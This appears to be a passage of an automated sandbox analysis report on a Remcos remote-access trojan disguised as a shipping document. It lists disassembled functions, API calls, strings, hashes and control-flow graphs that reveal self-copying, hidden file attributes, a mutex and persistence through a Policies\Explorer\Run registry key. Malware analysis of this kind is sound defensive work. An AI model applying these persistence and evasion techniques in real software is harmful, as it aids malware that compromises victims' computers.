                                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                      • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                      • API String ID: 384173800-625181639
                                                      • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                      • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                      • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                      • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                      Function 0040D767 Relevance: 93.5, APIs: 12, Strings: 41, Instructions: 799COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 101 40e134-40e154 call 401e8f call 412902 call 4112b5 70->101 89 40d9b5-40d9bc 79->89 90 40d9ae-40d9b0 79->90 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 94 40d9c0-40d9cc call 41a463 89->94 95 40d9be 89->95 93 40dc95 90->93 93->49 105 40d9d5-40d9d9 94->105 106 40d9ce-40d9d0 94->106 95->94 99->79 108 40da18-40da2b call 401d64 call 401e8f 105->108 109 40d9db call 40697b 105->109 106->105 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 141 40da13 call 4064d0 140->141 141->108 166 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 190 40dad7-40db03 call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e 164->190 222 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 166->222 169 40dbb1-40dbbb call 4082d7 167->169 170 40db35-40dba7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->170 177 40dbc0-40dbe4 call 4022f8 call 4338c8 169->177 257 40dbac-40dbaf 170->257 198 40dbf3 177->198 199 40dbe6-40dbf1 call 436050 177->199 232 40db08-40db1d call 401e18 call 401e13 190->232 204 40dbf5-40dc6a call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 call 4338d1 call 401d64 call 40b125 198->204 199->204 204->222 272 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 204->272 273 40dd79-40dd7b 222->273 274 40dd5e 222->274 232->163 257->177 272->222 292 40dc93 272->292 275 40dd81 273->275 276 40dd7d-40dd7f 273->276 278 40dd60-40dd77 call 41beb0 CreateThread 274->278 279 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->279 276->278 278->279 330 40dea1 279->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 279->331 292->93 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 343 40def9-40df0c call 401d64 call 401e8f 332->343 344 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->344 353 40df6c-40df7f call 401d64 call 401e8f 343->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->354 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 388 40dfe0 366->388 389 40dfe3-40dff6 CreateThread 366->389 388->389 390 40e004-40e00b 389->390 391 40dff8-40e002 CreateThread 389->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->101 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                      APIs
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000104), ref: 0040D790
                                                        • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                      • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                      • API String ID: 2830904901-2121370267
                                                      • Opcode ID: 1484b2f7a7f91c3ee938c637a9a7dae7839d2338987acae383d1c6a0cb17adc1
                                                      • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                      • Opcode Fuzzy Hash: 1484b2f7a7f91c3ee938c637a9a7dae7839d2338987acae383d1c6a0cb17adc1
                                                      • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                      Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0040BC75
                                                      • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                      • CopyFileW.KERNELBASE(C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                      • _wcslen.LIBCMT ref: 0040BD54
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000000,00000000), ref: 0040BDF2
                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                      • _wcslen.LIBCMT ref: 0040BE34
                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                      • ExitProcess.KERNEL32 ref: 0040BED0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                      • String ID: 6$C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$del$open$BG$BG
                                                      • API String ID: 1579085052-1346731980
                                                      • Opcode ID: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                      • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                      • Opcode Fuzzy Hash: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                      • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                      Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LongNamePath
                                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                      • API String ID: 82841172-425784914
                                                      • Opcode ID: c2d06ea8c2a66cf5c705706c372c41cf9f81b2c3d5dea1c7eec24b750922d7eb
                                                      • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                      • Opcode Fuzzy Hash: c2d06ea8c2a66cf5c705706c372c41cf9f81b2c3d5dea1c7eec24b750922d7eb
                                                      • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                      Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                        • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                        • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                        • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                      • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCurrentOpenProcessQueryValue
                                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                      • API String ID: 1866151309-2070987746
                                                      • Opcode ID: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                      • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                      • Opcode Fuzzy Hash: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                      • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                      Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 652 412774-412787 RegCreateKeyW 653 4127c6 652->653 654 412789-4127c4 call 4022f8 call 401e07 RegSetValueExW RegCloseKey 652->654 656 4127c8-4127d4 call 401e13 653->656 654->656
                                                      APIs
                                                      • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                      • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,759237E0,?), ref: 004127AD
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,759237E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                      • API String ID: 1818849710-1051519024
                                                      • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                      • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                      • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                      • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                      Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 662 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                      APIs
                                                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                      • GetLastError.KERNEL32 ref: 0040BEF1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateErrorLastMutex
                                                      • String ID: (CG
                                                      • API String ID: 1925916568-4210230975
                                                      • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                      • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                      • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                      • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                      Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 665 412513-41253f RegOpenKeyExA 666 412541-412567 RegQueryValueExA RegCloseKey 665->666 667 412572 665->667 666->667 668 412569-412570 666->668 669 412577-412583 call 401f66 667->669 668->669
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                      • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                      • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                      • Opcode Fuzzy Hash: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                      • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                      Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 672 4124b7-4124df RegOpenKeyExA 673 4124e1-412509 RegQueryValueExA RegCloseKey 672->673 674 41250f-412512 672->674 673->674 675 41250b-41250e 673->675
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                      • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                      • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                      • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                      • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                      Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 704 43360d-433610 705 43361f-433622 call 43a88c 704->705 707 433627-43362a 705->707 708 433612-43361d call 442200 707->708 709 43362c-43362d 707->709 708->705 712 43362e-433632 708->712 713 433638-433dec call 433d58 call 437bd7 712->713 714 433ded-433e09 call 433d8b call 437bd7 712->714 713->714
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                        • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3476068407-0
                                                      • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                      • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                      • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
